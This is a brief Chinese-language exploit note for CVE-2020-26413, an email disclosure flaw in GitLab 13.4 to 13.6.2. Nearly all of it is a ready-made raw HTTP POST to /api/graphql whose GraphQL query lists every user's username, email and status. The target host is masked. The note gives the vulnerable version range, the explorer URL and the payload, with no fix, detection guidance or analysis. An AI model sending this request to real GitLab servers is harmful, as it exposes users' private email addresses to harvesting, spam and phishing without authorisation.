GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413
GitLab 13.4 – 13.6.2
访问 URL http://xxx.xxx.xxx.xxx/-//graphql-explorer
具体的包
POST /api/graphql HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 212 Content-Type: application/json {"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}